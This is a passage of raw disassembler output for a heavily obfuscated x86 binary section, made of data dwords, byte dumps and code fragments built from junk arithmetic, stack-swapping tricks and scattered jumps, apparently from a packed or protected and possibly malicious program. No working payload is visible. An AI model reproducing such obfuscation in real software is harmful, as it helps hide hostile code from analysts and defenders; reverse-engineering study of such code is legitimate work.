dd 179EE9h, 24148700h, 0F18B565Ah, 8D243487h, 43A66E05h
dd 0AFE95200h, 0FFFFFEh, 87C80B00h, 0C659240Ch, 815EF606h
dd 0E2A58BEAh, 6DF28138h, 363FA41h, 2B01E9D5h, 0CDE80000h
dd 17h, 87007D89h, 3C872414h, 5FD78B24h, 0C015FFh, 41E80043h
dd 9, 0F2D38100h, 0E9D470C8h, 63Eh, 24348700h, 685ED68Bh
dd 5B8C9114h, 98CE815Eh, 0FFA337Bh, 2BC988h
db 0
; ---------------------------------------------------------------------------
loc_43AC1D: ; CODE XREF: _5qvhby1c:0043A0D6�j
jmp loc_43ADC5
; ---------------------------------------------------------------------------
align 4
and edx, 0AFCF05C7h
jmp loc_43D7DA
; ---------------------------------------------------------------------------
align 10h
dd 0C4860F9Dh, 0E9FFFFFBh, 174Dh, 24148700h, 8B242C87h
dd 0C7815DD5h, 0BF0C33E7h, 207FE9h, 8B000000h, 0FB83E9C7h
dd 0FFFFh, 8A9D008Bh, 68992C00h, 43B93Bh, 1879E9h, 81550000h
dd 99AD0FC0h, 4879D63h, 0FCE2E924h, 1487FFFFh, 0D2685A24h
dd 5878FE25h, 0DC6AE081h, 0E881239Bh, 79BC2679h, 3A8AF881h
dd 68E9D732h, 68FFFFFAh, 43D49Bh, 27E8E9h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE40
loc_43ACA9: ; CODE XREF: sub_43AE40:loc_43BCA8�j
or edx, 8E905D38h
xor edx, 0FE1E05C7h
add esi, edx
pop edx
jmp loc_43B10E
; END OF FUNCTION CHUNK FOR sub_43AE40
; ---------------------------------------------------------------------------
xchg ecx, [esp]
pop ecx
add ecx, 5B5FCFB5h
add eax, ecx
push 439EA5h
jmp loc_43B023
; ---------------------------------------------------------------------------
loc_43ACD3: ; CODE XREF: _5qvhby1c:loc_43D451�j
call near ptr dword_43CB48+27h
; ---------------------------------------------------------------------------
dd 92E90000h, 0E9000007h, 0F6Eh
db 0C3h ; ; CODE XREF: sub_43D51D-53B�j
; ---------------------------------------------------------------------------
loc_43ACE5: ; CODE XREF: _5qvhby1c:0043DF90�j
jmp near ptr dword_43BC30+39h
; ---------------------------------------------------------------------------
db 0E9h ;
db 7Fh ;
db 1Ah
db 0
db 0
db 0
db 0
db 0C3h ;
db 0
db 81h ;
db 0EFh ;
db 10h
db 95h ;
db 3Dh ; =
db 7Eh ; ~
db 81h ;
db 0E7h ;
db 8Dh ;
db 45h ; E
db 0BBh ;
db 0B0h ;
db 81h ;
db 0F7h ;
db 0C1h ;
db 2Ah ; *
db 0EAh ;
db 0DFh ;
db 3
db 0CFh ;
db 5Fh ; _
db 8Bh ;
db 9
db 0E9h ;
db 64h ; d
db 0F1h ;
db 0FFh
db 0FFh
db 0
db 8Bh ;
db 0F1h ;
db 87h ;
db 34h ; 4
db 24h ; $
db 8Bh ;
db 0CEh ;
db 5Eh ; ^
db 68h ; h
db 46h ; F
db 10h
db 98h ;
db 9Bh ;
db 0E9h ;
db 63h ; c
db 26h ; &
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
or edi, eax
pop edx
jmp sub_43B655
; ---------------------------------------------------------------------------
loc_43AD2C: ; CODE XREF: _5qvhby1c:0043C619�j
jz loc_43C626
jmp loc_43CBD1
; ---------------------------------------------------------------------------
xor ebx, 0EC8B0C72h
add ebx, ebp
add ebx, 34B1C67Ch
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43AD45: ; CODE XREF: sub_43B7F1+13FB�j
; DATA XREF: sub_43DF7B+5�o
xor al, 3
pop ebx
jmp loc_43CFC8
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
align 2
loc_43AD4E: ; CODE XREF: _5qvhby1c:loc_43A820�j
; _5qvhby1c:0043AA76�j
sub ecx, 0D4131AFCh
add ecx, 0A12237C9h
xchg ecx, [esp]
jmp loc_43A65B
; ---------------------------------------------------------------------------
dw 0EFE8h
dd 0FFFFF3h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43AD69: ; CODE XREF: sub_43B7F1-192D�j
jmp loc_43B367
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
dw 2300h
; ---------------------------------------------------------------------------
std
jmp loc_43A2C6
; ---------------------------------------------------------------------------
align 4
dd 5F243C87h, 0FC88B51h, 0BF57240Ch, 43CC8Ch, 11CDE9h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_43AD8F: ; CODE XREF: _5qvhby1c:loc_43C29F�j
or edi, 0D166051Eh
add edi, 6300A9DAh
xor edi, 3CEF7F78h
test ecx, edi
jmp loc_43BF77
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A9C4
loc_43ADA8: ; CODE XREF: sub_43A9C4+18�j
add esi, 3D2A2753h
add esi, ebp
push eax
push 0EACBC9E3h
pop eax
and eax, 0CDD0FD0Eh
rol eax, 0Ah
jmp near ptr loc_43DAA8+1
; END OF FUNCTION CHUNK FOR sub_43A9C4
; ---------------------------------------------------------------------------
loc_43ADC5: ; CODE XREF: _5qvhby1c:loc_43AC1D�j
push (offset loc_43DE1A+1)
jmp locret_43A8AB
; ---------------------------------------------------------------------------
align 10h
not ebx
sbb edi, 40C68F7Fh
jmp loc_43CFE7
; ---------------------------------------------------------------------------
db 2 dup(0), 0C3h ; CODE XREF: _5qvhby1c:loc_43C4FC�j
dd 0FFF359E9h, 0E90000FFh, 0FFFFFA09h, 1CE90000h, 2Eh
dd 0DAE16800h, 0DFE90043h, 0FFFFFAh, 0EEC19D00h, 81FA0316h
dd 0A31EADC2h, 1CEA8180h, 68795C32h, 439F7Ch, 0FFF626E9h
dd 0C30000FFh, 0C6C300h, 0F0815887h, 0B63F9E17h, 48CDC081h
dd 0C50300C8h, 1D1EE9h, 8D0F0000h, 1F4Eh
; =============== S U B R O U T I N E =======================================
sub_43AE40 proc near ; CODE XREF: sub_43BB5F+739�p
; FUNCTION CHUNK AT 0043ACA9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043B10E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BCA8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D48A SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push edx
push 0E38FE0E5h
pop edx
add edx, 442D5AB9h
jmp loc_43BCA8
sub_43AE40 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 0C300h
dd 0FEB2E900h, 0FFFFh, 0B34E9h, 0D6810000h, 4B44C717h
dd 0A1E9E91Bh, 8100000Dh, 7A1407D2h, 243487D5h, 66C1815Eh
dd 0E91A5A80h, 0FFFFF86Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B8D3
loc_43AE88: ; CODE XREF: sub_43B8D3:loc_43D239�j
; DATA XREF: sub_43B8D3+B�o
xchg esi, [esp+0]
jmp loc_43CE38
; END OF FUNCTION CHUNK FOR sub_43B8D3
; ---------------------------------------------------------------------------
dd 2162E8h, 0BE2E6800h, 9EE90043h, 4, 7FE85F5Dh, 1Eh, 0FAF18100h
dd 81E58EBDh, 0B1D7BFC1h, 0F7999DBFh, 28850FF9h, 0E8FFFFF8h
dd 2E34h, 0D6E90000h, 2Ch, 0F0958D0Fh, 0FFFFh, 8D1E9h
dd 14E0C100h, 0E7FFE081h, 840F4816h, 28C7h, 0FFF6E5E9h
dd 14840FFFh, 0E900002Ch, 402h, 7D830000h, 8DE000F0h, 18B2h
dd 2961E9h, 458B0000h, 5448AF0h, 8DE950E0h, 5, 0FF00C600h
dd 16C6C158h, 43C05368h, 1D78E900h, 0
dd 0EF79830Fh, 0CD81FFFFh, 420FE5D2h, 0FFEF02E9h, 81C0D1FFh
dd 103411C0h, 1C3BE903h, 0
; ---------------------------------------------------------------------------
mov edi, ebx
jmp loc_43DA85
; ---------------------------------------------------------------------------
align 4
dd 0C300h, 0E5EE9h, 0A0E90000h, 2Eh, 0E8F04DFFh, 1941h
; CODE XREF: _5qvhby1c:0043C4B5�j
dd 15DDE900h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_43AF73: ; CODE XREF: _5qvhby1c:0043D18D�j
call sub_43DBF7
call near ptr dword_43A724+5Dh
jmp loc_43DD7E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B845
loc_43AF82: ; CODE XREF: sub_43B845+8�j
jmp loc_43C78F
; END OF FUNCTION CHUNK FOR sub_43B845
; ---------------------------------------------------------------------------
db 0Fh
dd 11D685h, 28E95B00h, 0FFFFF6h, 43CCD568h, 1D2AE900h
dd 0E8810000h, 0AC41A8E0h, 9EFDC081h, 4BE8AC73h, 3, 0FAADE900h
dd 0F00FFFFh, 15988Ah, 243C8700h, 2414875Fh, 0FFF0DDE8h
dd 530000FFh, 0FB086468h, 243C871Fh, 815FDF8Bh, 75A286EBh
dd 1FC3C158h, 1C55E9h, 0C6C30000h, 685A8B02h, 11E44AAEh
dd 0EAC88158h, 0E97DDAEEh, 0AD9h, 0E2680000h, 0E90043A4h
dd 0F1Dh
db 2 dup(0)
word_43B00A dw 3CB8h ; DATA XREF: sub_43B6FF:loc_43D7AF�o
dd 4E924h, 0C3000000h, 0E8530000h, 39Ah, 0D63E9h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_43B023: ; CODE XREF: _5qvhby1c:0043ACCE�j
jmp locret_43C7F3
; ---------------------------------------------------------------------------
dd 8BE90000h, 12h, 87D1F700h, 8159240Ch, 61026F2h, 14879D8Dh
; CODE XREF: _5qvhby1c:0043CED9�p
dd 0C6689C24h, 0E9CAB048h, 0FFFFF7BDh
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_225. PRESS KEYPAD "+" TO EXPAND]
align 10h
jmp loc_43B6D6
; ---------------------------------------------------------------------------
align 2
db 56h ; V
db 0BEh ;
db 0DEh ;
db 0CDh ;
db 43h ; C
db 0
db 0E9h ;
db 80h ;
db 2Dh ; -
db 0
db 0
db 2 dup(0), 0C3h ; CODE XREF: sub_43C80D+17�j
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BEF5
loc_43B066: ; CODE XREF: sub_43BEF5+1F87�j
jmp loc_43DD08
; END OF FUNCTION CHUNK FOR sub_43BEF5
; ---------------------------------------------------------------------------
jmp loc_43BCEF
; ---------------------------------------------------------------------------
dd 0F87D8300h, 35850F00h, 0E9FFFFEFh, 174h, 0C30000h, 28B6E900h
dd 0
; ---------------------------------------------------------------------------
pop eax
sub eax, 0FCD3D784h
or eax, 4B57288Ah
add eax, 0D97A8B84h
jmp loc_43D90B
; ---------------------------------------------------------------------------
or ebp, ecx
and eax, 6CCA2817h
push 43A5EBh
jmp loc_43D705
; ---------------------------------------------------------------------------
align 4
dd 0AF96F881h, 0CCE9BC6Bh, 0FFFFFF7h, 0FFFB6781h, 0E9DA2BFFh
dd 0FFFFFB9Eh, 0C7810000h, 0B471E884h, 46E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43B0DE: ; CODE XREF: _5qvhby1c:0043A5A6�j
mov byte ptr [edx], 3
pop edx
push 0EC76D881h
xchg edx, [esp]
mov eax, edx
pop edx
loc_43B0ED: ; CODE XREF: _5qvhby1c:loc_43C6B5�j
rol eax, 14h
jmp loc_43A700
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
; ---------------------------------------------------------------------------
add al, 24h
push offset byte_43DE8E
jmp locret_43D052
; ---------------------------------------------------------------------------
dd 0C30000h, 34EE9h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE40
loc_43B10E: ; CODE XREF: sub_43AE40-188�j
jmp loc_43D48A
; END OF FUNCTION CHUNK FOR sub_43AE40
; ---------------------------------------------------------------------------
align 4
dd 0C300h, 87CF8B51h, 82E8240Ch, 0E9000026h, 9Fh, 4AAE9h
dd 0D5850000h, 21EFE9h, 0
off_43B138 dd offset sub_43E113 ; DATA XREF: sub_43DACC+4�r
align 10h
dword_43B140 dd 116h dd 9AAE900h, 0F0E90000h, 0Bh, 862A9969h, 0F7840F00h, 0E9000021h
dd 2732h, 5E243487h, 0B20BC281h, 6FE89FB3h, 2Bh, 0A45E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_43B176: ; CODE XREF: _5qvhby1c:0043DDA8�j
retn
; ---------------------------------------------------------------------------
db 0E9h
dd 0FFFFF6CFh
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_235. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp locret_43B63C
; ---------------------------------------------------------------------------
dd 0DE8B5300h, 68241C87h, 0EAC3868Eh, 0AC6C15Eh, 0D2EEE681h
dd 70E893EAh
db 0F9h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DACC
loc_43B19F: ; CODE XREF: sub_43DACC+10�j
push 0F9EF9442h
pop edx
sub edx, 0BA450865h
xor edx, 7515B41Ch
add edx, 0A733B537h
xor eax, eax
cld
jmp loc_43AA1F
; END OF FUNCTION CHUNK FOR sub_43DACC
; ---------------------------------------------------------------------------
align 10h
mov ecx, ebp
jmp loc_43D2B4
; ---------------------------------------------------------------------------
db 0E8h
dd 1C72h, 96E08100h, 814CA13Ah, 0A386CAC0h
db 0B3h
byte_43B1D9 db 36h, 0, 29h ; DATA XREF: _5qvhby1c:0043A2DB�o
dd 2C840FD0h, 6A00002Ah, 0F9F9E8FFh
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B4B3
loc_43B1EB: ; CODE XREF: sub_43B4B3:loc_43DF05�j
xchg ebp, [esp+0]
call near ptr dword_439F20+20h
locret_43B1F3: ; CODE XREF: _5qvhby1c:0043DD02�j
retn
; END OF FUNCTION CHUNK FOR sub_43B4B3
; ---------------------------------------------------------------------------
jmp loc_43DF1B
; ---------------------------------------------------------------------------
align 2
jmp locret_43C4EE
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
push 5226FA11h
xchg esi, [esp]
mov edx, esi
loc_43B20B: ; CODE XREF: _5qvhby1c:loc_43D68C�j
jmp loc_43BCA1
; ---------------------------------------------------------------------------
dd 0C0F70000h, 0F2479563h, 0FFF507E9h, 241C87FFh, 29F0815Bh
; CODE XREF: sub_43D51D:loc_43C4CB�p
dd 51C1ECEFh, 0FFFD40E9h, 0F3815BFFh, 2DA58430h, 0B43FC381h
dd 6CE907BFh, 15h
db 0
; ---------------------------------------------------------------------------
locret_43B241: ; CODE XREF: _5qvhby1c:loc_43C064�j
retn
; ---------------------------------------------------------------------------
push 0ECD3EE67h
; =============== S U B R O U T I N E =======================================
sub_43B247 proc near
push 43A391h
jmp nullsub_241
sub_43B247 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
dw 0E900h ; CODE XREF: _5qvhby1c:0043D513�j
dd 1ED7h, 0B9515200h, 43C86Ah, 15FFE9h
db 0
; =============== S U B R O U T I N E =======================================
sub_43B265 proc near ; CODE XREF: sub_43A382+109C�p
; FUNCTION CHUNK AT 0043C127 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043C25F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043CBA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CC19 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push esi
push 0C5BC657Ah
pop esi
rol esi, 12h
sub esi, 0C26F3F4Eh
jmp loc_43CBA1
sub_43B265 endp
; ---------------------------------------------------------------------------
dw 8300h
dd 0F00F07Dh, 152D8Dh, 0FC458B00h, 0F0000C6h, 23DB85h
dd 14D7E900h
db 3 dup(0)
byte_43B29B db 3 ; DATA XREF: sub_43A470+1B�o
dd 10B951D3h, 0E90043DEh, 0FFFFFCB6h, 0E90000C3h, 1FA8h
; ---------------------------------------------------------------------------
loc_43B2B0: ; CODE XREF: _5qvhby1c:0043B725�j
jmp loc_43DA79
; ---------------------------------------------------------------------------
xchg ecx, [esp]
pop ecx
push ecx
push 6BAF415Ah
pop ecx
sub ecx, 2E48AC93h
or ecx, 0B9B1258h
add ecx, 0A52338FCh
jmp loc_43BC9B
; ---------------------------------------------------------------------------
db 85h
; ---------------------------------------------------------------------------
aad 0E9h
cmp large ds:0, ebx
locret_43B2E0: ; CODE XREF: _5qvhby1c:0043D3C0�j
retn
; ---------------------------------------------------------------------------
db 0E9h ;
db 57h ; W
db 0FCh ;
db 0FFh
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_43B2E6 proc near ; CODE XREF: _5qvhby1c:loc_43B6A0�p
; FUNCTION CHUNK AT 0043AA7D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D8EF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043DF49 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov byte ptr [ebx], 87h
pop ebx
push eax
mov eax, offset loc_43BD1B
jmp loc_43DF49
sub_43B2E6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0
db 87h ;
db 14h
db 24h ; $
db 87h ;
db 0Ch
db 24h ; $
db 8Bh ;
db 0D1h ;
db 59h ; Y
db 0E8h ;
db 70h ; p
db 0FAh ;
db 0FFh
db 0FFh
db 0
db 0
; =============== S U B R O U T I N E =======================================
sub_43B30A proc near ; CODE XREF: _5qvhby1c:0043C614�p
; _5qvhby1c:0043DA65�j
xchg eax, [esp+0]
pop eax
mov byte ptr [eax], 0
push ebp
mov ebp, ecx
jmp near ptr dword_43B66C+1Ah
sub_43B30A endp
; ---------------------------------------------------------------------------
db 0
db 99h ;
db 81h ;
db 0E3h ;
db 0E6h ;
db 4Dh ; M
db 0C7h ;
db 8Eh ;
db 3
db 0FAh ;
db 13h
db 0C1h ;
db 0E9h ;
db 0B6h ;
db 0F3h ;
db 2 dup(0FFh), 0
byte_43B32B db 0C6h ; DATA XREF: sub_43A7DE:loc_43D140�o
dd 3C878702h, 5FD78B24h, 0E8241C87h, 881h, 82EE900h, 0
db 87h ;
db 14h
db 24h ; $
db 5Ah ; Z
db 57h ; W
db 8Bh ;
db 0F8h ;
db 87h ;
db 3Ch ; <
db 24h ; $
db 0E9h ;
db 0D6h ;
db 1Bh
db 0
db 0
align 4
dd 0C2C1C201h, 41C23103h, 0F6BD850Fh, 0BFE9FFFFh
db 0F0h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43B367: ; CODE XREF: sub_43B7F1:loc_43AD69�j
push esi
mov esi, edx
xchg esi, [esp+4+var_4]
mov edx, offset loc_43A688
jmp loc_43B3B1
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
loc_43B377: ; CODE XREF: _5qvhby1c:0043CA22�j
ror edi, 0Bh
sbb edi, 2E06B196h
xor esi, eax
and ebx, 0C19FF97Ah
loc_43B388: ; CODE XREF: _5qvhby1c:loc_43CA0F�j
xor eax, 20647E4h
add eax, ebp
push edi
push 0D1981EA2h
jmp loc_43DB5C
; ---------------------------------------------------------------------------
align 4
dword_43B39C dd 0A735C281h, 0C4E8A03Dh, 1, 0C0CE900h, 0C30000h
; CODE XREF: _5qvhby1c:0043C2B3�j
; DATA XREF: _5qvhby1c:0043C82A�o
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43B3B1: ; CODE XREF: sub_43B7F1-47F�j
jmp loc_43D87C
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
loc_43B3B6: ; CODE XREF: _5qvhby1c:0043B8CD�j
xchg eax, [esp]
pop eax
push eax
mov eax, offset loc_43D510
jmp loc_43D50A
; ---------------------------------------------------------------------------
loc_43B3C5: ; CODE XREF: _5qvhby1c:0043B864�j
jbe loc_43AADA
loc_43B3CB: ; CODE XREF: _5qvhby1c:loc_43C626�j
push 43A863h
jmp loc_43D905
; ---------------------------------------------------------------------------
align 2
dw 5668h
dd 0E90043B0h, 0FFFFFEC8h, 0C43BDA81h, 0C87C1E5h, 24048724h
dd 358C88Bh, 0AA4E8F5h, 0E9000000h, 23BDh, 0FE8B0000h
dd 22E9DD87h, 0C3000013h
db 0
; ---------------------------------------------------------------------------
loc_43B409: ; CODE XREF: _5qvhby1c:0043A909�j
xchg eax, [esp]
xchg esi, [esp]
mov eax, esi
pop esi
pop ecx
loc_43B413: ; DATA XREF: _5qvhby1c:0043BA24�o
push 34h
and al, 0E9h
popf
sbb [eax], eax
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A382
loc_43B41B: ; CODE XREF: sub_43A382+9�j
xchg ebx, [esp-4+arg_0]
call sub_43B265
push 1ACC15FCh
xchg ecx, [esp+0]
mov eax, ecx
pop ecx
sub eax, 489AAA13h
and eax, 0C98EDE7h
sub eax, 0AC41A8E0h
jmp loc_43C48A
; END OF FUNCTION CHUNK FOR sub_43A382
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
; ---------------------------------------------------------------------------
or al, 24h
xchg edx, [esp]
mov ecx, edx
pop edx
push eax
mov eax, offset byte_43C0A3
jmp loc_43B494
; ---------------------------------------------------------------------------
xchg ebp, [esp]
mov esi, ebp
pop ebp
and esi, 0C8BFE203h
push ebp
mov ebp, ebx
jmp loc_43BA21
; ---------------------------------------------------------------------------
align 10h
dd 901C600h, 0C300C659h, 0FFE937E8h, 524FB8FFh, 0C0090042h
dd 45F840Fh, 5F680000h, 0E90043C3h, 97Ah
; ---------------------------------------------------------------------------
loc_43B494: ; CODE XREF: _5qvhby1c:0043B456�j
mov byte ptr [eax], 0FFh
pop eax
push 0FFFFFFFFh
push offset byte_43C09B
jmp locret_43A9E1
; ---------------------------------------------------------------------------
mov eax, edi
xchg eax, [esp]
mov edi, offset loc_43C4DE
jmp loc_43D21C
; =============== S U B R O U T I N E =======================================
sub_43B4B3 proc near ; CODE XREF: _5qvhby1c:0043A2CD�p
; FUNCTION CHUNK AT 0043B1EB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043DF05 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push ebp
mov ebp, edi
jmp loc_43DF05
sub_43B4B3 endp
; ---------------------------------------------------------------------------
align 10h
dd 0F0458900h, 0F87DE9h, 0D74850Fh, 45C60000h, 0C8E930E0h
db 12h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_43B4D7: ; CODE XREF: _5qvhby1c:loc_43AA18�j
add edi, 9409F335h
jmp loc_43CEDE
; ---------------------------------------------------------------------------
align 4
dd 0A172C181h, 0C87087Fh, 14875924h, 5ACA8B24h, 0F966E951h
dd 815AFFFFh, 37D9C6E2h, 0C5F281B8h, 8183AD52h, 0F758BCC2h
dd 0E9D503D5h, 1DEFh, 1E27860Fh, 0CEC10000h, 0DED78104h
dd 0E911C69Dh, 2752h, 0A6870F00h, 87FFFFECh, 0FD2FE9C5h
dd 0FFFFh, 43B44768h, 0FE6CE900h, 0FFFFh, 0F2F8F0Fh, 7AE90000h
dd 25h, 0C8810F00h, 68FFFFE8h, 1C57C246h, 89C08158h, 0E90440D3h
dd 0FFFFFA2Ch, 87FE3300h, 35F243Ch, 3FC281D5h, 895B41D4h
dd 6AE95A02h, 0Ch, 0A9E9C300h, 0E900001Ch, 0FFFFF021h
dd 89E90000h, 0FFFFEDh, 0EADB880Fh, 3487FFFFh, 0D0FF5E24h
dd 344E9h, 0E8000000h, 24DBh, 0C8030000h, 2463E9h, 0E99D0000h
dd 247Fh, 7A680000h, 0E90043ABh, 0FFFFE9D9h, 0C1D10000h
dd 8408F181h, 0DE8488Ch, 68000010h, 43BF7Eh, 98FE9h, 9C000000h
dd 0E8A23A68h, 241487C6h, 815AC28Bh, 0CBDDEAE0h, 5CF08189h
dd 0E928F532h, 1820h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43B602: ; CODE XREF: _5qvhby1c:0043AAE5�j
xchg esi, [esp]
pop esi
push offset loc_43A7C4
jmp locret_43BC12
; ---------------------------------------------------------------------------
dd 0FF01C600h, 8B241487h, 0F7815ACAh, 0AA898FA2h, 16E8FD03h
dd 0FFFFF6h, 588B00C6h, 8B243C87h, 0C1C15FCFh, 0F36AE90Dh
dd 0FFFFh
; ---------------------------------------------------------------------------
locret_43B63C: ; CODE XREF: _5qvhby1c:0043B17F�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFE7BBh, 10F9E9h
db 3 dup(0)
; ---------------------------------------------------------------------------
locret_43B64B: ; CODE XREF: _5qvhby1c:0043A33D�j
retn
; ---------------------------------------------------------------------------
dd 0EEE90000h, 1Ch
db 0
; =============== S U B R O U T I N E =======================================
sub_43B655 proc near ; CODE XREF: _5qvhby1c:0043AD27�j
; _5qvhby1c:0043BA73�p
; FUNCTION CHUNK AT 00439E94 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043B70A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043BFF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C7A5 SIZE 00000005 BYTES
xchg edi, [esp+0]
xchg ecx, [esp+0]
mov edi, ecx
pop ecx
add edx, 0E5A5A932h
loc_43B664: ; DATA XREF: _5qvhby1c:loc_43D377�o
mov edx, [edx]
jmp loc_43BFF6
sub_43B655 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0C6h
dword_43B66C dd 595F8707h, 0E9240C87h, 0FFFFF7E1h, 8C0F0000h, 0FFFFED89h
dd 2500E9h, 74E90000h, 0Bh, 0E9E38100h, 1B2CA1F5h, 0E7C981C6h
dd 0E91D0F1Ch, 0B55h
; ---------------------------------------------------------------------------
loc_43B6A0: ; CODE XREF: _5qvhby1c:0043BA29�j
call sub_43B2E6
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 2570h, 0C30000h, 0ECB1E900h, 0FFFFh, 0C081C503h, 0EC10C161h
dd 6968008Bh, 0E90043C0h, 2606h, 0E92A8B00h, 0AB4h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43B6D6: ; CODE XREF: _5qvhby1c:0043B050�j
call sub_43B893
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7FC
loc_43B6DD: ; CODE XREF: sub_43B7FC-16C4�j
jmp loc_43CE79
; END OF FUNCTION CHUNK FOR sub_43B7FC
; ---------------------------------------------------------------------------
dw 8700h
; ---------------------------------------------------------------------------
adc al, 24h
pop edx
push edx
mov edx, ecx
xchg edx, [esp]
mov ecx, offset loc_43D6F1
jmp loc_43C6CB
; ---------------------------------------------------------------------------
align 4
dd 88820F00h
db 6, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43B6FF proc near ; CODE XREF: sub_43B655-17B7�p
; FUNCTION CHUNK AT 0043D7AF SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
jmp loc_43D7AF
sub_43B6FF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B655
loc_43B70A: ; CODE XREF: sub_43B655-17BD�j
push offset loc_43A0D0
jmp loc_43C7A5
; END OF FUNCTION CHUNK FOR sub_43B655
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43B715: ; CODE XREF: _5qvhby1c:loc_43A37B�j
mov byte ptr [edi], 87h
push edi
push 3D630971h
pop edi
add edi, 2BB719DDh
jmp loc_43B2B0
; ---------------------------------------------------------------------------
dw 0C600h
dd 58598B01h, 407C685Eh, 38E996F9h, 0FFFFF2h, 0F3E91787h
dd 23h, 0ADE9F323h, 2, 5200C300h, 1487D18Bh, 0B4F56824h
dd 348770DFh, 5ECE8B24h, 68D1C981h, 61E91959h, 4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A713
loc_43B76C: ; CODE XREF: sub_43A713+32A1�j
rol ecx, 11h
sub ecx, 0BE65D04Ah
or ecx, 783502FEh
add ecx, 6EBF23EBh
jmp loc_43C37D
; END OF FUNCTION CHUNK FOR sub_43A713
; ---------------------------------------------------------------------------
align 4
add ebx, 9A04DF64h
xor ebx, 31BC2826h
add ebx, ebp
add ebx, 4D48FE5Ch
mov [ebx], eax
pop ebx
push 5D6993F5h
push edi
jmp loc_43D377
; ---------------------------------------------------------------------------
sub eax, 0AC41A8E0h
cmp eax, 0AB205F2Ah
jmp loc_43D88A
; ---------------------------------------------------------------------------
align 4
dd 4C08100h, 715965DAh, 4FE92404h, 0Ch, 0E1685100h, 87430731h
dd 0CA8B2414h, 80DE9h, 14870000h, 22685324h, 5BE9064Ah
dd 0FFF02EE9h, 1B0000FFh
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_43B7F1 proc near ; CODE XREF: sub_43C14F-1EFB�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439EB4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043A630 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AAD2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043AD45 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043AD69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B367 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043B3B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C574 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CB3D SIZE 0000000B BYTES
